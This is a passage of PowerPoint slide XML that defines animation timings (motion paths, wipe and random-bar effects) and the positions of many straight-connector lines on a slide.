                                    <p:animMotion origin="layout" path="M -0.13711 0.09097 L -0.27696 0.35278 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-6992" y="13079"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="100" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 6.25E-7 1.11111E-6 L 0.08372 0.18055 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="4180" y="9028"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="102" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="103" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.27696 0.35278 L -0.10769 0.51759 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="8464" y="8241"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="105" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.08372 0.18055 L 0.19544 0.40579 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="5586" y="11250"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="107" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="108" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="109" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>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69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>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70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="118" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="119" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="120" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="122" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="125" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="128" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="129" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="131" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="134" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="135" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="136" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="84"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="137" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="138" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13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61" grpId="0"/>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Straight Connector 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8E5F52-C85A-4DFD-AA31-BEA9006EC73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3203388" y="2318824"/>
            <a:ext cx="5262184" cy="3121043"/>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73" name="Straight Connector 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6A02F3-F823-4273-8974-2C9822ED8B01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3203388" y="2902186"/>
            <a:ext cx="3613817" cy="2537681"/>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75" name="Straight Connector 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE91B8B3-825B-4F3F-A60D-9CE07784C68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3282900" y="4444101"/>
            <a:ext cx="4647563" cy="1109433"/>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78" name="Straight Connector 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF23EE9E-845A-4D29-9A30-EB0D07D34F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3249648" y="5553534"/>
            <a:ext cx="4094896" cy="510898"/>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83" name="Straight Connector 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB65908-1CFE-4BEE-B31C-36B77C12A9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3249648" y="5553534"/>
            <a:ext cx="5859645" cy="70949"/>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84" name="Straight Connector 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A598A10-C60A-40CA-9CDA-89E09EF1B2ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3249648" y="4740903"/>
            <a:ext cx="7824752" cy="812631"/>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87" name="Straight Connector 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AB95E0-CCBE-4D3C-A944-E0A1CB4FABF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3249649" y="3558669"/>
            <a:ext cx="6476292" cy="1951607"/>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68" name="Straight Connector 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED9EB44-890B-4F59-84A6-0E7078F819CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="59" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3294487" y="4796736"/>
            <a:ext cx="1842102" cy="756798"/>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64" name="Straight Connector 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{473C2FEF-8704-4FAD-A06D-DCB826A0C49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1226351" y="5624484"/>
            <a:ext cx="1651214" cy="77940"/>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126" name="Straight Connector 125">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA80BDB5-C82A-41DA-8608-E383CDD416F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4257431" y="2921015"/>
            <a:ext cx="965397" cy="1846609"/>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16" name="Straight Connector 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E6B4AAF-C9C7-40CF-B513-BDA48B2027FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="2902186"/>
            <a:ext cx="1643401" cy="1865438"/>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13" name="Straight Connector 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1B9384-206A-4FB2-A9E1-F6D361DB4914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5258366" y="4256475"/>
            <a:ext cx="2691749" cy="544435"/>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14" name="Straight Connector 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B5A891-A7D8-494C-B312-B4C5ECBE99D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5311736" y="4848549"/>
            <a:ext cx="2082585" cy="1099007"/>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82"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484" y="4522361"/>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856CB035-4AF0-4F70-89A2-6BEC1F0C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564" y="4585223"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="135" name="Straight Connector 134">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362DB111-83E5-4AD4-913F-8474318D7FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4286196" y="2318824"/>
            <a:ext cx="4154188" cy="616648"/>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29" name="Straight Connector 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3FD83A0-050F-4E58-948E-96F2D29FC4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2889343"/>
            <a:ext cx="2551154" cy="31671"/>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32" name="Straight Connector 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE6C47D-BFAC-45D7-8D0B-79CB099CED0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4297102" y="2957003"/>
            <a:ext cx="3504258" cy="1301944"/>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39" name="Straight Connector 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F2DF72B-C36F-41FC-9474-FDE687AD5971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4321734" y="2935472"/>
            <a:ext cx="4787559" cy="2814982"/>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45" name="Straight Connector 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487910AD-3B1A-4925-BD32-9EA06C71B176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4273744" y="3016397"/>
            <a:ext cx="5476574" cy="632106"/>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48" name="Straight Connector 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39639310-2D87-4D93-90DE-4905C4EE9239}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3002809"/>
            <a:ext cx="6896940" cy="1635682"/>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55" name="Straight Connector 154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C76C3E-DC48-4B34-BA70-9EB738C44A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4286196" y="3026512"/>
            <a:ext cx="3020657" cy="2804867"/>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19" name="Straight Connector 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F637DB3-271B-42C7-B413-74DA1AE8DD73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4110726" y="1437883"/>
            <a:ext cx="66826" cy="1451459"/>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76" name="Straight Connector 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E01391-D87A-4210-A270-4C9F9F4616AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6956900" y="2399897"/>
            <a:ext cx="1755211" cy="518645"/>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97" name="Straight Connector 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382D9DC5-46AD-43BD-830B-50CF89400FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8638424" y="2468638"/>
            <a:ext cx="1104899" cy="109003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01" name="Straight Connector 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0626BEF-65AD-401F-AB13-C78E1C220E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9881246" y="3708665"/>
            <a:ext cx="1301890" cy="947975"/>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03" name="Straight Connector 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{557D0680-9560-49EF-BC86-EABED05472ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9302916" y="4767624"/>
            <a:ext cx="1954841" cy="1052954"/>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04" name="Straight Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F1E162-528F-48B3-B6CF-EA2C6156B9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7930462" y="4258948"/>
            <a:ext cx="1302127" cy="1443476"/>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05" name="Straight Connector 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA26BF8A-9E92-48E0-876F-523C7A8347D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
